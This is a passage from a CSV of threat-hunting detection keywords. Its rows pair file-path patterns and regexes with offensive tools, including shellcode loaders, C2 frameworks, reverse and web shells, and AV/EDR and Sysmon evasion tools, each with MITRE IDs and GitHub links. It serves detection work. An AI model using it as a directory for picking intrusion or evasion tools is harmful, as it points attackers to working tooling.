spawning","https://github.com/yehia-mamdouh/Shell3er/blob/main/Shell3er.ps1","1","1","N/A","N/A","10","59","12","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z" "*/shellcode*loader.bin*",".{0,1000}\/shellcode.{0,1000}loader\.bin.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","202","39","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" "*/shellcode.bin*",".{0,1000}\/shellcode\.bin.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*/shellcode.bin.*",".{0,1000}\/shellcode\.bin\..{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*/shellcode.hex*",".{0,1000}\/shellcode\.hex.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. 
Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*/shellcode.hpp*",".{0,1000}\/shellcode\.hpp.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" 
"*/shellcode_callback.exe*",".{0,1000}\/shellcode_callback\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/shellcode_excel*",".{0,1000}\/shellcode_excel.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/ShellCode_Loader*",".{0,1000}\/ShellCode_Loader.{0,1000}","offensive_tool_keyword","cobaltstrike","ShellCode_Loader - Msf&CobaltStrike Antivirus ShellCode loader. Shellcode_encryption - Antivirus Shellcode encryption generation tool. 
currently tested for Antivirus 360 & Huorong & Computer Manager & Windows Defender (other antivirus software not tested).","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Axx8/ShellCode_Loader","1","1","N/A","10","10","401","48","2022-09-20T07:24:25Z","2022-09-02T14:41:18Z" "*/shellcode_samples/*",".{0,1000}\/shellcode_samples\/.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*/shellcode_sources/*",".{0,1000}\/shellcode_sources\/.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*/ShellcodeFluctuation*",".{0,1000}\/ShellcodeFluctuation.{0,1000}","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","10","10","845","147","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z" "*/Shellcode-Hide.git*",".{0,1000}\/Shellcode\-Hide\.git.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*/SHELLCODELOADER*",".{0,1000}\/SHELLCODELOADER.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - 
Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*/Shellcode-Loader.git*",".{0,1000}\/Shellcode\-Loader\.git.{0,1000}","offensive_tool_keyword","Shellcode-Loader","dynamic shellcode loading","T1055 - T1055.012 - T1027 - T1027.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ReversingID/Shellcode-Loader","1","1","N/A","10","2","179","37","2024-04-08T20:20:59Z","2021-08-08T08:53:03Z" "*/shellcodes/utils.py*",".{0,1000}\/shellcodes\/utils\.py.{0,1000}","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. 
It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","1","N/A","10","10","247","72","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" "*/shellcodetester*",".{0,1000}\/shellcodetester.{0,1000}","offensive_tool_keyword","shellcodetester","This tools test generated ShellCodes","T1059.003 - T1059.005 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","POST Exploitation tools","https://github.com/helviojunior/shellcodetester","1","1","N/A","N/A","1","81","29","2023-11-01T23:29:28Z","2019-06-11T04:39:58Z" "*/shellcode-xor.py*",".{0,1000}\/shellcode\-xor\.py.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","1","N/A","10","7","N/A","N/A","N/A","N/A" "*/ShellGhost.git*",".{0,1000}\/ShellGhost\.git.{0,1000}","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","10","1025","127","2023-10-16T06:40:24Z","2023-07-01T16:56:58Z" "*/shellinject*",".{0,1000}\/shellinject.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1075","161","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" "*/ShellPop*",".{0,1000}\/ShellPop.{0,1000}","offensive_tool_keyword","ShellPop","Shellpop is all about popping shells. 
With this tool you can generate easy and sophisticated reverse or bind shell commands to help you during penetration tests.","T1059 - T1574 - T1055 - T1021","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/0x00-0x00/ShellPop","1","0","N/A","N/A","10","1428","235","2019-04-02T14:53:19Z","2018-03-08T03:58:00Z" "*/Shells/shell.aspx*",".{0,1000}\/Shells\/shell\.aspx.{0,1000}","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/JoelGMSec/PyShell","1","1","N/A","N/A","3","272","56","2023-10-23T14:24:14Z","2021-10-19T07:49:17Z" "*/Shells/shell.jsp*",".{0,1000}\/Shells\/shell\.jsp.{0,1000}","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/JoelGMSec/PyShell","1","1","N/A","N/A","3","272","56","2023-10-23T14:24:14Z","2021-10-19T07:49:17Z" "*/Shells/shell.php*",".{0,1000}\/Shells\/shell\.php.{0,1000}","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. 
Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/JoelGMSec/PyShell","1","1","N/A","N/A","3","272","56","2023-10-23T14:24:14Z","2021-10-19T07:49:17Z" "*/Shells/shell.py*",".{0,1000}\/Shells\/shell\.py.{0,1000}","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/JoelGMSec/PyShell","1","1","N/A","N/A","3","272","56","2023-10-23T14:24:14Z","2021-10-19T07:49:17Z" "*/Shells/shell.sh*",".{0,1000}\/Shells\/shell\.sh.{0,1000}","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/JoelGMSec/PyShell","1","1","N/A","N/A","3","272","56","2023-10-23T14:24:14Z","2021-10-19T07:49:17Z" "*/Shells/tomcat.war*",".{0,1000}\/Shells\/tomcat\.war.{0,1000}","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. 
Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/JoelGMSec/PyShell","1","1","N/A","N/A","3","272","56","2023-10-23T14:24:14Z","2021-10-19T07:49:17Z" "*/Shells/wordpress.zip*",".{0,1000}\/Shells\/wordpress\.zip.{0,1000}","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/JoelGMSec/PyShell","1","1","N/A","N/A","3","272","56","2023-10-23T14:24:14Z","2021-10-19T07:49:17Z" "*/ShellServe.git*",".{0,1000}\/ShellServe\.git.{0,1000}","offensive_tool_keyword","ShellServe","Multi-client network fileserver with integrated shell functionality crafted in C using system calls for efficient and direct file and command processing","T1059 - T1505 - T1046 - T1569","TA0002 - TA0007 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/7etsuo/ShellServe","1","1","N/A","6","1","N/A","N/A","N/A","N/A" "*/shellshock.py*",".{0,1000}\/shellshock\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*/sherlocksecurity/*",".{0,1000}\/sherlocksecurity\/.{0,1000}","offensive_tool_keyword","POC","POC and exploit tools on github","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - 
TA0006","N/A","N/A","Exploitation tools","https://github.com/sherlocksecurity","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Shhhavoc.py*",".{0,1000}\/Shhhavoc\.py.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","1","N/A","9","10","1048","172","2024-04-26T14:24:52Z","2021-09-28T16:52:24Z" "*/Shhhloader.git*",".{0,1000}\/Shhhloader\.git.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","1","N/A","9","10","1048","172","2024-04-26T14:24:52Z","2021-09-28T16:52:24Z" "*/Shhmon.exe*",".{0,1000}\/Shhmon\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/Shhmon/*",".{0,1000}\/Shhmon\/.{0,1000}","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","3","216","36","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z" "*/ShimDB.git*",".{0,1000}\/ShimDB\.git.{0,1000}","offensive_tool_keyword","ShimDB","Shim database persistence 
(Fin7 TTP)","T1546.011","TA0003","N/A","N/A","Persistence","https://github.com/jackson5sec/ShimDB","1","1","N/A","9","1","35","10","2020-02-25T09:41:53Z","2018-06-21T00:38:10Z" "*/ShimsInstaller.*",".{0,1000}\/ShimsInstaller\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/ShInject.exe*",".{0,1000}\/ShInject\.exe.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","8","10","N/A","N/A","N/A","N/A" "*/shocknawe/*",".{0,1000}\/shocknawe\/.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential 
Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","63","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "*/shodan-api.nse*",".{0,1000}\/shodan\-api\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Shoggoth.exe*",".{0,1000}\/Shoggoth\.exe.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","1","N/A","8","6","581","81","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z" "*/Shoggoth.git*",".{0,1000}\/Shoggoth\.git.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","1","N/A","8","6","581","81","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z" "*/shspawnas/*",".{0,1000}\/shspawnas\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/ShuckNT.git*",".{0,1000}\/ShuckNT\.git.{0,1000}","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is designed to downgrade - convert - dissect and shuck authentication tokens based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","10","1","60","9","2023-10-11T13:50:11Z","2023-01-27T07:52:47Z" "*/si1ent-le/CVE-2022-0847*",".{0,1000}\/si1ent\-le\/CVE\-2022\-0847.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/si1ent-le/CVE-2022-0847","1","1","N/A","N/A","1","0","2","2022-03-08T05:18:15Z","2022-03-08T04:51:02Z" "*/SigFlip.*",".{0,1000}\/SigFlip\..{0,1000}","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "*/sigflip.x64.*",".{0,1000}\/sigflip\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "*/sigflip.x86.*",".{0,1000}\/sigflip\.x86\..{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
